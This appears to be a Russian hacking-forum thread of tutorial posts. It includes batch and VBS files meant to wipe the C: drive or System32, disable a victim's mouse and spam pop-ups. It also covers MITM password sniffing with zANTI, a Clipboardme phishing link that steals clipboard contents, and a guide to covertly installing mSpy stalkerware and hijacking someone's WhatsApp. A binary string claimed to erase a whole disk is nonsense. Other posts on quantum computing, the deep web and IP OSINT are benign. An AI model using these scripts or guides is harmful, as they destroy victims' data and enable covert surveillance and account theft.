if NOT %pass%== techmaniya.com goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End

5. Удалите содержимое диска C:
​

Хотите жестко отомстить в хакерском стиле? Этот трюк для вас. Скопируйте и вставьте приведенный ниже код, и сохраните под любым названием, но с расширением «.bat». Когда этот файл откроется на любом ПК, он сотрет весь диск C:.
Код:

@Echo off
Del C:\ *.* |y

6. Очистите весь жесткий диск
​

Если Блокнот может стереть весь диск C:, сможет ли он стереть весь жесткий диск? Ответ: Да. Ниже написан код для этой цели. Обязательно присвойте файлу расширение «.exe» после копирования кода в «Блокнот». Как только файл будет открыт, весь жесткий диск сотрется.
Код:

01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000
​

 

[BlackMAST]

Скрытые возможности Блокнота, о которых вы никогда не слышали

Вступить в наш чат

Программу Блокнот очень сильно недооценивают. Признайтесь, как часто вы пользуетесь ей? Готовы поспорить, что все ваши действия в этой программе заканчиваются на наборе случайного текста с периодичностью раз в год. А знаете ли вы какие-либо скрытые функции? Мы уже начали делиться с вами фишками блокнота в предыдущей части. В этой статье осветим ещё больше полезных возможностей программы.​

Если вы не читали нашу прошлую статью, то жмите сюда.

1. Выключаем компьютер

Это одна из самых популярных функций блокнота, с помощью которой вы сможете выключить любой компьютер. Скопируйте и вставьте приведенный ниже код в Блокнот и сохраните его, присвоив расширение «.bat». Например, «открой меня.bat». Как только ваш друг откроет этот файл на своем компьютере, ПК сразу же выключится! Также на экране жертвы появится сообщение, которое вы сможете настроить по своему желанию. Как вариант: «Осторожно! Мы наблюдаем за тобой» или «Мы нашли тебя».

Код:
@echo off
Shutdown.exe -s -t 10
cls
msg *напишите тут любой текст

​

2. Постоянно всплывающее сообщение

Похоже, что в блокноте скрыто много способов разыграть знакомых, и это один из них. С помощью этого пранка вы сможете поиграть на нервах жертвы, заставив ее значительно попотеть. И причиной тому будет постоянно всплывающее сообщение на экране пользователя. Скопируйте и вставьте код в Блокнот и сохраните его как «message.bat» на компьютере. При открытии он будет постоянно отображать ваше сообщение.

Код:
@ECHO off
:Begin
msg * Привет
msg * я тебя взломал
msg * ахаха
msg * страшно?
GOTO BEGIN

​

3. Взлом Блокнота на ПК

Хотите узнать, как заставить компьютер открывать бесконечное количество Блокнотов? Вы можете вывести компьютер из строя только с помощью нескольких строк кода. Скопируйте и вставьте код взлома в Блокнот и сохраните его как «unlimitednotepad.bat». Вы можете послать этот файл в виде вложения по электронной почте любому, кого хотите разозлить.

Код:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO BEGIN​

4. Ложное сообщение об ошибке

Еще одна шутка, чтобы поиздеваться над знакомыми. Эта уловка может из ниоткуда вызвать на экране всплывающее сообщение об ошибке. Добавьте любой текст и сохраните файл как «error.vbs» после того, как скопируете код.

Код:
X=Msgbox(“Вставьте сюда ваше сообщение”,0+16,”Напишите тут заголовок”)
5. Автоматическое нажатие Backspace
​

В этом пранке вы можете взломать клавишу backspace на любом компьютере, чтобы жертва не смогла ничего напечатать. Для этого скопируйте и вставьте приведенный ниже код взлома. Это гарантировано не даст пользователю ничего написать.

Код:
MsgBox “Backspace again and again and AGAIN”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
​

6. Удалить Windows/System32

А вот мы и добрались до более серьезных и опасных вещей. Речь пойдет о скрытом способе, с помощью которого вы можете автоматически удалить папку System32 любого компьютера. Предупреждаем, что это безвозвратно выведет систему из строя, так что будьте осторожны. На свой страх и риск скопируйте и вставьте код в Блокнот и сохраните его как «erase.bat».

Код:
EL C:\WINDOWS\SYSTEM32\*.*/Q

7. Отключите управление мышью
​

Блокнот не перестает удивлять, и на этот раз у нас есть трюк, который выключает управление мышью на ПК жертвы. Для этого скопируйте и вставьте код взлома, и дайте ему любое имя, используя расширение «.bat». Это полностью отключит мышь, так что будьте аккуратны.

Код:
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

​

8. Непрерывное нажатие Enter

Как и с клавишей backspace, этот трюк будет непрерывно продолжать нажимать «Enter» на компьютере. Скопируйте и вставьте указанный ниже код, и сохраните его, используя расширение «.vbs».

Код:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
​

Вот вы и познакомились со скрытыми возможностями блокнота. Надеемся, что из этой статьи вы узнали несколько новых и полезных для себя функций. А на этом все. Удачи!​

 

[WallStreet]

Очень крутая тема. Много полезной и нужной информации.

 

[BlackMAST]

Что такое квантовые вычисления, и как они изменят наш мир

Что такое квантовые вычисления, и как они изменят наш мир
​

​

Вступить в наш чат
​

Квантовые вычисления — это технология будущего, которая может произвести революцию во многих отраслях, включая кибербезопасность. В этой статье мы расскажем о происхождении квантовых вычислений, об их влиянии на настоящее, и какие их прогнозы относительно будущего.

Итак, давайте начнем.

Происхождение квантовых вычислений
​

Концепция квантовых вычислений была впервые представлена ​​в 1980-х годах Ричардом Фейнманом, который предположил, что квантовые компьютеры могут выполнять вычисления, выходящие за рамки возможностей классических компьютеров.

В 1990-х годах Питер Шор разработал алгоритм, который показал, что квантовые компьютеры могут разлагать большие числа на множители за полиномиальное время, что считается непосильной задачей для классических компьютеров.
Первый в мире квантовый компьютер

Текущий сценарий
​

В настоящее время квантовые компьютеры находятся на ранних стадиях разработки, и потому еще не представляют существенную значимость. Однако, уже на данный момент квантовые компьютеры успели оказать некое влияние на криптографию.

Многочисленные криптографические методы, которые в настоящее время считаются самыми безопасными, такие как RSA и ECC, оказалась уязвимы для атак квантовых компьютеров. Именно поэтому в настоящее время разрабатываются новые постквантовые методы, которые будут устойчивы к таким атакам.
Квантовый компьютер

Будущее квантовых вычислений

​

Будущее квантовых вычислений является многообещающим, так как исследователи добились уже некоторых успехов в разработке практических квантовых компьютеров. Например, Google разработала квантовый компьютер с 53 кубитами, а IBM представили квантовый компьютер с 65 кубитами. Кроме того, Microsoft работает над созданием топологического кубита, который может быть более устойчивым к ошибкам, чем существующие кубиты.

Влияние на криптографию
​

Как упоминалось ранее, квантовый компьютер может взломать многие криптографические методы, которые в настоящее время считаются безопасными. Таким образом, квантовый компьютер с 4000 кубитов может взломать 256-битное шифрование ECC всего за несколько минут.

Это означает необходимость разрабатывать новые постквантовые криптографические методы, способные противостоять атакам квантовых компьютеров. Одним из примеров такого метода является криптография на основе решетки, которая устойчива к таким атакам.

Примеры потенциального влияния квантовых вычислений на криптографию
​

Одним из примеров потенциального влияния квантовых вычислений на криптографию является уязвимость цифровых подписей. Цифровые подписи, использующиеся для проверки подлинности электронных документов, основаны на математических алгоритмах, которые оказались уязвимыми для атак квантовых компьютеров.

Следовательно, разработка новых постквантовых схем цифровой подписи будет способна противостоять таким атакам.

Еще одним примером его потенциального влияния на криптографию является уязвимость защищенных коммуникаций. Например, протокол обмена ключами, используемый в Transport Layer Security (TLS), который защищает онлайн-транзакции, может быть взломан квантовым компьютером.

Заключение

​

В заключение следует отметить, что квантовые вычисления — это новая, малоизученная технология, которая может оказать значимое влияние на все сферы нашей жизни. Хотя квантовые компьютеры еще недоступны, исследователи сумели добиться успеха уже на стадии их разработки.

Тем не менее, влияние на криптографию означает, что требуется разрабатывать новые постквантовые криптографические методы, способные противостоять атакам со стороны квантовых компьютеров. Оставаясь в курсе последних разработок в области квантовых вычислений и криптографии, мы можем обеспечить безопасность нашего цифрового мира перед лицом новых угроз.

 

[BlackMAST]

Лучшее хакерское приложение для Android

Лучшее хакерское приложение для Android

Вступить в наш чат

Хотите иметь инструменты для взлома и тестирования на проникновение прямо в мобильном устройстве? И нет, сегодня мы не будем рассказывать про фейковые приложения для взлома или программы для розыгрыша друзей. Пришло время научиться взламывать как настоящий профи с помощью инструмента zANTI. У нас есть, чем вас удивить! Этот карманный помощник может взламывать пароли, беспроводные сети, изменять http-запросы, а также многое другое. И всё это можно сделать прямо в вашем телефоне.

​

zANTI — набор инструментов для мобильного пентестинга, который позволяет вам выполнять вредоносные атаки в сети, такие как: взлом роутеров, аудит паролей, создание и запуск HTTP-сервера на вашем Android-устройстве, сканирование устройства на наличие открытых портов, проверка устройства на уязвимость shellshock и SSL poodle. Короче говоря, это приложение — универсальный инструмент для хакеров во всех его проявлениях.
1) Установка zANTI

Шаг 1: Зайдите на официальный сайт zANTI Toolkit.

Шаг 2: Введите свой адрес электронной почты, после чего появится ссылка для скачивания:
​

Шаг 3: Загрузите файл apk на свой телефон.

Шаг 4: Поставьте флажок рядом с «Установкой из неизвестных источников».

Шаг 5: Сразу же после этого файл apk можно будет установить.

Шаг 6: Откройте приложение, предоставьте ему все запрашиваемые разрешения и подключитесь к сети Wi-Fi.


С помощью zANTI вы можете делать следующее:
1. Перехват HTTP-сессий с использованием MITM

Эта функция позволит вам перенаправить весь HTTP-трафик на определенный сервер или сайт. Для этого нажмите на значок настроек и поместите URL-адрес в пробел. Вы также можете перенаправить HTTPS на HTTP, чтобы сделать сеть менее безопасной и более удобной для взлома.
2. Перехват загрузок

Эта функция позволит вам подключиться к папке загрузок хоста и получить копию всех файлов. Например, если вы выберете «.pdf» в меню, то все PDF-файлы будут загружены на ваш телефон. Вы можете легко заставить жертву скачать вредоносные программы, а также завладеть их загрузками для получения конфиденциальной информации.
3. Изменить HTTP-запросы и ответы

Используйте функцию zPacketEditor, которая позволяет вам взломать HTTP-запросы в вашей сети. Вы можете редактировать и отправлять каждый запрос и ответ.
4. Проверка уязвимостей роутера

Router pwn — это веб-приложение для проверки уязвимостей роутера. Это набор «готовых к запуску» локальных и удаленных эксплойтов. Чтобы начать ими пользоваться, сначала нажмите «Routerpwn.com», а затем выберите поставщика маршрутизатора.
5. Взлом паролей

Это основная функция zANTI, с помощью которой вы можете перехватывать пароли в сетях. Для этого выберите устройство и нажмите кнопку «MITM». Результаты отобразятся в разделе сохраненных паролей. Такой способ взлома паролей очень распространен в Интернете, и называется он «сниффинг».
6. Проверка устройства на наличие уязвимостей

Сначала выберите устройство и нажмите «Shellshock/SSL Poodle». Приложение начнет сканирование, которое займет некоторое время, после чего вы увидите результат.
7. Сканирование Nmap

Сканирование Nmap даст вам краткую сводку о жертве и сети, в том числе об открытых портах, IP-адресе, операционной системе и т. д. Это может быть очень полезно для деанона жертвы и поиска дальнейших способов взлома.

Заключение
​

Это были основные функции, которые вы можете выполнить с помощью zANTi. Как вы уже поняли, приложение может похвастаться большим выбором инструментов для пентестинга. Интерфейс zANTI лаконичен и прост в использовании. Таким образом, сегодня вы узнали, как взломать и проверить устройство на уязвимости прямо с телефона. Надеемся, вам понравилась данная тема. Увидимся в следующей статье!
​

 

[BlackMAST]

Лучшее приложение для взлома паролей на Android

Лучшее приложение для взлома паролей на Android

Вступить в наш чат
​

Хотите взломать пароль, но у вас нет навыков работы с Kali Linux или вовсе нет компьютера — не беспокойтесь, теперь вы можете хакнуть пароли с помощью одного лишь телефона. А поможет нам в этом Hash Suite Droid — инструмент для взлома паролей на Android. Сегодня мы вам расскажем, что он из себя представляет, и как им пользоваться.

Что такое Hash Suite Droid
​

Hash Suite Droid — это Android-версия известного набора инструментов для взлома паролей. Проще говоря, это инструмент, который взламывает хэши паролей с помощью вашего устройства Android. А главный его плюс заключается в том, что он не требует root-доступа и абсолютно бесплатен.

Итак, сейчас мы на практике покажем вам, как пользоваться этим инструментом.

Установка
​

Шаг 1: Загрузите и установите apk-пакет инструмента.

Вы можете сделать это на их официальном сайте по ссылке. Если вас интересует код и технические детали, ознакомьтесь с информацией на Github.

Шаг 2: Импорт хэшей паролей.

После установки вам необходимо импортировать хэши на свой телефон, щелкнув параметр ИМПОРТ в меню.

Шаг 3: Выберите методы, правила и параметры.

Приложение Hash Suite Droid поддерживает брутфорс-атаку на следующие типы хеширования:

LM; NTLM; MD5; SHA1; SHA256; SHA512; DCC/2; WPA-PSK; BCRYPT.

Опции:

поддержка брутфорс атаки методом грубой силы, атаки по словарю, комбинированной атаки по правилам;
выбор количества задействования ядер CPU;
настройка диапазона температурного режима батареи в с° в установившемся рабочем режиме.

Давайте немного подробнее рассмотрим методы взлома паролей:

Атака по словарю. Что делает словарь, так это сравнивает пароль в списке слов с паролем, который вы хотите взломать. Это самый эффективный метод взлома паролей в настоящее время. Пока у вас есть всеобъемлющий список слов, вы можете взломать любой пароль. Вы также можете добавить и собственные словари.
Брутфорс атака. Многие люди в качестве пароля используют популярные слова или комбинации букв. Примером может служить «qwerty» или «12345». Существует и множество других готовых шаблонов, которые вы можете применить в своей атаке. Приложение также имеет множество других параметров настройки.
Атака по фразе. Если пароль содержит фразу, то его можно легко взломать этим методом.
Комбинированная атака. В такой атаке вы сами устанавливаете комбинации букв. Это грубая атака, но с правильным подходом вы можете сделать ее более эффективной. Например, вы вправе определить длину символа и тип выбираемых символов, а также многое другое.

Запуск атаки
​

После того, как вы выбрали метод и параметры атаки на пароль, вы можете приступить к взлому.

В зависимости от производительности устройства, время взлома пароля будет варьироваться. Однако, многие пароли взламываются мгновенно. Убедитесь, что ваше устройство достаточно заряжено. Этот процесс ресурсоемкий, а взлом пароля всегда занимает много времени. Наберитесь терпения, только тогда ваша атака будет успешной. После того, как вы успешно хакнули пароль, вы его сразу же увидите в списке паролей.




Вот так просто вы научились взламывать пароли прямо в телефоне.

Часто задаваемые вопросы (FAQ)

​

№1. Этот инструмент бесплатный?

Да, этот инструмент для пентеста можно использовать совершенно бесплатно.


№2. Я могу взломать любой пароль?

Да, вы можете взломать любой пароль, если у вас есть хороший словарь, и пароль соответствует хешу в предоставленном словаре.


№3. Приложение безопасно для устройства?

Конечно, это не повредит вашему устройству. Однако, мы все же рекомендуем ограничить использование батареи и процессора, чтобы ваше устройство не сильно нагревалось. Взлом паролей требует большой вычислительной мощности и может привести к быстрому нагреву вашего устройства.


№4 Приложение работает на IOS?

К сожалению, нет. Приложение поддерживается только на андроид.

Заключение
​

Hash Suite Droid - отличное хакерское приложение, как для новичков, так и для продвинутых пользователей. Вы можете сами устанавливать собственные критерии для взлома, контролировать процесс и наслаждаться результатом за считанные минуты. Приложение просто в использовании, а главное полностью бесплатно и с открытым исходным кодом.

 

[BlackMAST]

Как взломать содержимое буфера обмена

Как взломать содержимое буфера обмена

Вступить в наш чат
​

«Копировать-вставить, копировать-вставить.» С большим количеством учетных записей и их паролей, люди привыкли сохранять данные в текстовом файле, чтобы в дальнейшем просто их скопировать и вставить в нужное поле. Да, такой подход существенно экономит время, но также делает данные пользователей более уязвимыми для взлома. Сейчас мы расскажем о способе, который позволяет удалено читать и контролировать чужие данные буфера обмена.

​

Как взломать данные буфера обмена с помощью Clipboardme?
​

Шаг 1: Откройте терминал Kali Linux и введите следующую команду, чтобы клонировать инструмент:

git clone https://github.com/cyberkallan/clipboardme

Шаг 2: Теперь переключитесь в каталог с помощью команды cd и запустите скрипт с помощью bash. Просто введите команды, указанные ниже:

cd clipboardme

bash clipboardme.sh

Шаг 3: Теперь выберите инструмент переадресации портов. Мы предпочитаем Ngrok, но при необходимости вы можете использовать serveo.net.

​

​

Шаг 4: После этого появится ссылка, как показано выше. Как только жертва откроет ее, содержимое буфера обмена будет скопировано.

Совместимость с браузером:
​

Если браузер обновлен до последней версии, то взлом сработает, но жертва увидит следующий запрос на разрешение:

​

​

Шаг 5: Если вы хотите проверить скопированный контент, просто откройте текстовый файл clipboard_backup. Вы также можете использовать те же команды:

cd clipboardme

cat clipboard_backup.txt

Как работает взлом Clipboardme?

​

Clipboardme — это инструмент пентестера, который может получить доступ для чтения и записи к содержимому в буфере обмена, просто открыв ссылку. Последние версии браузеров не позволяют сделать взлом скрытным, отображая запрос, как было показано выше, однако старые версии могут напрямую копировать содержимое буфера обмена жертвы, используя API.

API изначально предназначался для того, чтобы напрямую интегрировать копирование и вставку между приложениями и сайтами. Проблема в том, что существует очень мало способов защитить скопированный текст. Таким образом, этот хак может легко взломать данные буфера обмена. Для этого введите:

<script>

navigator.clipboard.readText().then(clipText => document.write(clipText));

</script>

Теперь вы можете успешно выполнить взлом буфера обмена и прочитать данные без ведома жертвы.

Поскольку вы видели, как работает взлом, то вам наверняка стало интересно, как защитить свои данные.

Ниже приведены советы, которые вам помогут обезопасить себя от подобного взлома.

1) Обновите свой браузер:

Вы должны обновлять свой браузер каждый раз, когда доступна новая версия. Мы также рекомендуем загрузить и использовать несколько браузеров, чтобы обеспечить максимально безопасную работу в Интернете. Чтобы проверить версию вашего браузера, щелкните значок шестеренки в меню настроек (три точки, расположенные вертикально друг над другом) в правом верхнем углу, затем щелкните параметр справки и пункт «О Google Chrome». Откроется новая вкладка, и вы увидите последнюю версию Google Chrome, установленную в вашей системе.

2) Удаляйте данные из буфера обмена после использования:

Есть много способов очистить данные буфера обмена вручную в операционной системе Windows. Самый простой способ — нажать «Windows + V», вы увидите данные буфера обмена в правом углу. Нажмите «Очистить все» или «Удалить определенные записи».

На этом все. Соблюдайте меры безопасности и используйте инструмент с умом. Удачного взлома!












​

 

[BlackMAST]

Seekr - новый мультизадачный инструмент для OSINT

Seekr - новый мультизадачный инструмент для OSINT

​

Вступить в наш чат
​

Хотите собрать информацию о человеке, но поиск и анализ данных отнимают слишком много времени и сил? Сегодня мы расскажем, как упростить этот процесс с помощью нового инструмента - Seekr. Независимо от того, являетесь ли вы специалистом по OSINT, кибер-разведчиком или новичком, желающим попробовать себя в этом деле, Seekr упрощает поиск необходимых данных и управление ими.


​

Преимущества Seekr

​

Seekr сочетает в себе ведение заметок и OSINT в одном приложении. Он разработан и оптимизирован с учетом всех потребностей для OSINT. Seekr можно использовать вместе с другими приложениями, так как он станет отличным дополнением вашего разведческого инструментария.

Ключевая особенность:
​

База данных для OSINT;
GitHub для отправки по электронной почте;
Учетные карточки для каждого человека в базе данных;
Обнаружение аккаунта, интеграция с карточками аккаунта.

​

Установка

​

Windows

Загрузите последний exe здесь

Linux (стабильная версия)

Загрузите файл отсюда

Linux (нестабильная)

Чтобы установить Seekr в Linux, просто запустите:

git clone https://github.com/seekr-osint/seekr
cd seekr
go run main.go

Теперь откройте веб-интерфейс в выбранном вами браузере.

Запуск на NixOS

Seekr создан с учетом NixOS и поэтому поддерживает nix flakes. Чтобы запустить Seekr в NixOS, выполните следующие команды:

nix shell github:seekr-osint/seekr
seekr

Начало работы
​

journey
title How to Intigrate seekr into your current workflow.
section Initial Research
Create a person in seekr: 100: seekr
Simple web research: 100: Known tools
Account scan: 100: seekr
section Deeper account investigation
Investigate the accounts: 100: seekr, Known tools
Keep notes: 100: seekr
section Deeper Web research
Deep web research: 100: Known tools
Keep notes: 100: seekr
section Finishing the report
Export the person with seekr: 100: seekr
Done.: 100

Заключение
​

Seekr — это удобный набор инструментов с простым интерфейсом, который может упростить ваш рабочий процесс и сделать его более эффективным. Он позволяет легко находить, систематизировать и управлять нужными данными. В целом, если вы ищете мультизадачный инструмент OSINT, который сочетает в себе ведение заметок и управление данными в одном месте, то Seekr определенно заслуживает вашего внимания.




​

 

[BlackMAST]

​

Вступить в наш чат

WhatsApp — один из самых популярных мессенджеров, которым пользуется треть населения планеты, и в приложении более 1,5 миллиарда активных пользователей. Разработчики этого приложения усердно работают, чтобы обеспечить максимальную безопасность для пользователей. Но тем не менее, существует множество шпионских приложений для взлома WhatsApp, которые можно использовать в скрытом режиме на телефоне жертвы. Эти приложения позволят вам в режиме реального времени отслеживать все действия, выполняемые во взломанной учетной записи WhatsApp. Сегодня мы расскажем о 2 таких способах хакинга.

Взлом WhatsApp с помощью приложения Mspy

mSpy — это самый простой способ получить доступ к чьим-то перепискам WhatsApp. Приложение доступно для скачивания как на iOS, так и на Android, поэтому вам не придется делать джейлбрейк телефона, чтобы установить его.
Кроме того, вы можете удаленно отслеживать активность пользователя с помощью панели управления mSpy.

Выполните следующие шаги, чтобы взломать WhatsApp жертвы:
Шаг 1: Перейдите на www.mspy.com. Введите свой адрес электронной почты и приобретите план в соответствии с вашими требованиями. Вы получите учетные данные для входа.
Шаг 2: Выберите тип устройства, которое вы хотите контролировать (устройство Android или iOS). Убедитесь, что у вас есть полный доступ к устройству, за которым вы хотите следить. Под полным доступом mSpy подразумевает, что вам нужен «физический» доступ к телефону на несколько минут.

Шаг 3: Выберите производителя устройства. Здесь вы получаете множество моделей устройств разных производителей, таких как Samsung, Huawei, Xiaomi и т.д. В качестве примера мы выберем Samsung, после чего нажмем кнопку «Продолжить».

Шаг 4: Укажите версию Android и отключите опцию PlayProtect. Для этого зайдите в Google Play и нажмите на значок профиля и нажмите кнопку Play Защита. Отключите параметр Сканирование приложений с помощью Play Защиты.

Шаг 5: Откройте браузер на устройстве жертвы;

• Зайдите: https://b55y.net/a;
• Нажмите кнопку «Скачать»;
• Нажмите OK, чтобы проигнорировать предупреждение;
• Установите APK-файл.

Шаг 6: Следуйте инструкциям на экране, чтобы настроить mSpy.
Шаг 7: Подождите некоторое время (пару часов), чтобы приложение mSpy записало активность телефона жертвы и отправило данные на сервер.

В панели инструментов выберите опцию WhatsApp. Вы можете увидеть звонки, сообщения и историю контактов Whatsapp нужного вам устройства.
Взлом WhatsApp по номеру телефона для устройств Mac с помощью спуфинга

Шаг 1: Во-первых, вы должны удалить WhatsApp с устройства, за которым вы хотите пошпионить.
Шаг 2: Узнайте MAC-адрес целевого устройства:
Выберите «Настройки» > «Основные» > «О программе» > «Адрес Wi-Fi».
Шаг 3: Установите инструмент взлома WhatsApp на нужном устройстве.
Установите Busy Box и эмулятор терминала на телефон жертвы.

Шаг 4: Замените MAC-адрес Wi-Fi вашего телефона на MAC-адрес телефона жертвы, используя эти два приложения.
Шаг 5: Теперь установите WhatsApp на свое устройство с номером телефона жертвы. Вы получите код подтверждения на устройстве другого пользователя. Используйте этот код шифрования на своем устройстве, чтобы войти в учетную запись WhatsApp цели. Теперь вы можете получать все сообщения жертвы на свой телефон.
Заключение

Вот вы и узнали о 2 способах установить слежку за перепиской пользователя. Взломать WhatsApp можно, но существует и риск быть пойманным, поскольку требуется прямой доступ к устройству жертвы. Однако, человеческая беспечность и социальная инженерия порой делают невозможное. Удачи!
​

 

[BlackMAST]

Deep Web и Dark Web — в чем разница

Вступить в наш чат

Что вы знаете о «глубокой сети»? Что там обитают хакеры, а обычным пользователям лучше держаться подальше от этого места? Тогда вы можете быть удивлены, узнав, что пользуетесь глубокой сетью каждый день. На самом деле, термин «глубокая сеть» часто путают с двумя другими словами «dark web» и «darknet».​

Если вы ни раз слышали эти понятия, но до сих пор не можете отличить одно от другого, то настало время наконец-то разобраться в этом. Поехали!

Весь интернет можно условно поделить на 2 части, подобно большому айсбергу.
Верхушка айсберга

Surface Web

Surface Web (Поверхностная или видимая сеть) — это сеть, которую мы используем изо дня в день. Мы все погружены в поверхностную паутину. Именно здесь происходит наша повседневная онлайн-деятельность и то, что большинство людей считают Интернетом. Это общедоступные бесплатные сайты, не требующие регистрации и установки каких-то специальных программ, которые можно посетить с помощью любого браузера.
Подводная часть

Подводная часть делится еще на 2 уровня:
Deep Web

Верхний уровень называется «глубокий Интернет» (Deep Web). К нему относятся веб-сайты, требующие верификации личности, ресурсы, которые невозможно найти, используя поисковики типа Google, или закрытые страницы. Вы отметили в профиле ВКонтакте, что хотите скрыть его от поисковиков? Сайт требует ввести капчу? Статья доступна только по подписке? Если что-то открыть все же можно, а найти — нельзя, то это тоже deep web.
Darknet

Нижний уровень — это темный анонимный Интернет (DarkNet). Обычному пользователю войти туда не помогут ни прямая ссылка, ни пароль. Узлы каждого отдельно взятого даркнета — серверы, компьютеры, роутеры — не видны не только поисковикам, но и большинству браузеров, поскольку для передачи данных внутри такой сети используются нестандартные протоколы. Доступ возможен только через специализированное программное обеспечение, например, Tor Browser, I2P, Freenet и т. д.
Вместе даркнеты составляют dark web (темный веб) — ту часть deep web, которая свободна от цензуры, никем не контролируется и не регулируется, поэтому привлекательна для многих темных личностей.
Разница между Deep Web и Dark Web

Вот основные различия между темной и глубокой сетью:

Безопасность

Теперь вы знаете, что данные, хранящиеся в «глубокой сети» являются безвредными, просто там они находятся в безопасности, «в глубине», незаметно для тех, кому они не предназначены. Вот если некоторые из них, например частная переписка, «всплывут на поверхность» и попадут в поисковый индекс, тогда начнутся проблемы. Поэтому лучше как следует защищать свой спрятанные кусочек айсберга — аккаунты и документы, к которым у вас есть доступ:

• Используйте уникальные и надежные пароли;
• Перед тем как вводить учетные данные, всегда проверяйте, где именно вы собираетесь это сделать. Например, если адрес страницы написан с ошибкой, то это верный признак того, что сайт является фишинговым;
• С осторожностью загружайте файлы и программы, так как некоторые из них содержат вредоносное ПО;
• Не предоставляйте доступ к конфиденциальным данным третьим лицам;
• Не бродите по темной сети, если не уверены в своей безопасности. Неизвестно на кого там можно нарваться.

 

[BlackMAST]

Вступить в наш чат

В наши дни онлайн-угрозы становятся все более изощренными и непредсказуемыми. Для расследования киберпреступлений и борьбы с ними требуется ряд методов и инструментов, одним из которых является OSINT IP-адреса. Этот мощный метод включает в себя использование аналитики из открытых источников для сбора информации об IP-адресах, включая выявление угроз, отслеживание киберпреступников и раскрытие вредоносной активности.​

В этой статье мы расскажем, как работает OSINT IP-адреса, а также поделимся советами и рекомендациями по проведению эффективных и безопасных расследований.

Что такое IP-адрес

IP-адрес — это уникальный числовой идентификатор, который присваивается устройству, подключенному к Интернету. Он состоит из двух компонентов: идентификатора сети и идентификатора хоста. Адреса IPv4 являются наиболее распространенным типом и состоят из четырех наборов чисел, разделенных точками, в то время как адреса IPv6 используют более длинный и сложный формат.

Адреса IPv4 — это наиболее распространенный тип IP-адресов, состоящий из четырех чисел, разделенных точками, например 192.168.0.1. Адреса IPv6 наоборот состоят из более длинной последовательности цифр и букв, разделенных двоеточиями. Например: 2001:0db8:85a3:0000:0000:8a2e:0370:7334.
Также важно понимать, что IP-адреса могут быть динамическими или статическими. Динамические IP-адреса периодически меняются, в то время как статические IP-адреса остаются неизменными, если их не поменять вручную.
Инструменты для OSINT IP-адреса

Существует несколько инструментов для проведения OSINT-расследований. Для каждого OSINT расследователя важно выбрать правильные инструменты под свои конкретные нужды.
Whois — это протокол, используемый для поиска информации о доменных именах, IP-адресах и других сетевых ресурсах. Используя инструмент поиска Whois, вы можете собирать информацию об IP-адресах, включая организацию, которой принадлежит блок IP-адресов, и контактную информацию администратора сети.

Инструмент GeoIP позволяет определить геолокацию IP-адреса и его физическое местоположение. Это может быть полезно для отслеживания киберпреступников, которые могут действовать из определенного местоположения.

Инструмент обратного поиска Reverse Lookup можно использовать для определения доменного имени, связанного с IP-адресом. Он помогает выявлять вредоносные домены, связанные с определенным IP-адресом.

hodan — это поисковая система, которая специализируется на сканировании устройств, подключенных к Интернету, включая серверы, маршрутизаторы и устройства IoT. Выполняя поиск IP-адресов или другой сетевой информации в Shodan, можно обнаружить уязвимые устройства, которые могут быть подвержены взлому.

Maltego — популярный инструмент для анализа данных, используемый в расследованиях OSINT. С помощью него вы можете визуализировать и анализировать сложные наборы данных, включая информацию об IP-адресах, в удобном для вас интерфейсе.

Сбор информации с IP-адреса

OSINT IP-адреса может предоставить ценную информацию для расследования киберпреступлений. Собирая информацию об IP-адресах, вы можете выявить потенциальных участников киберугроз и выследить киберпреступников, а также обнаружить вредоносную активность, например, источник фишинговой атаки.
В дополнение к вышеупомянутым преимуществам сбора информации с IP-адресов, есть и другие способы, которыми OSINT IP-адреса может быть полезен для специалистов по кибербезопасности:

1. Выявление скомпрометированных систем. Исследователи могут обнаруживать системы, в которых наблюдается подозрительная активность, путем анализа сетевого трафика, связанного с IP-адресом. Этот анализ может помочь в предотвращении кибератаки.
2. Проведение разведки угроз. С помощью OSINT IP-адреса специалисты по кибербезопасности собирают информацию о потенциальных киберугрозах. Они могут идентифицировать IP-адреса, связанные с известными вредоносными программами или группами киберпреступников, а также отслеживать распространение кибератак по разным сетям.
3. Отслеживание источника кибератак. Благодаря инструментам для OSINT IP-адреса можно отслеживать источник кибератак и идентифицировать лиц или организации, ответственные за них. Эта информация может быть использована для создания дела против киберпреступников и помощи правоохранительным органам в их расследованиях.

Таким образом, сбор информации с IP-адресов является важной частью расследования киберугроз и защиты от кибератак.
Использование IP-адреса для цифровой криминалистики

Цифровая криминалистика — это практика сбора, анализа и сохранения электронных данных для расследования киберпреступления. OSINT IP-адреса может быть ценным инструментом, поскольку он позволяет отслеживать источник кибератак и находить доказательства.
Вот несколько способов использования OSINT IP-адреса в цифровой криминалистике:

• Выявление вредоносного ПО. Анализируя сетевой трафик, связанный с IP-адресом, возможно не только выявить вредоносным ПО, но и отследить его источник. Это может помочь в определении масштабов кибератаки и ее предотвращении.
• Отслеживание киберпреступников. Используя OSINT IP-адреса, специалисты по кибербезопасности могут определить источник кибератаки и, возможно, отследить ответственных лиц. Эта информация может оказаться бесценной в судебных разбирательствах и возбуждении дела против киберпреступников.
• Расследование утечек данных. Эксперты могут использовать OSINT IP-адреса для расследования утечек данных и определения того, как произошла утечка. Анализируя сетевой трафик, связанный с IP-адресом, они могут выявить потенциальные уязвимости в системе и принять меры для предотвращения будущих нарушений.

Советы для проведения OSINT IP-адреса

При проведении OSINT-расследований IP-адресов важно следовать некоторым рекомендациям:

1. Используйте безопасные инструменты. Убедитесь, что инструменты, которые вы используете для OSINT IP-адреса, заслуживают доверия. Ищите инструменты, проверенные экспертами по кибербезопасности и имеющие надежную репутацию.
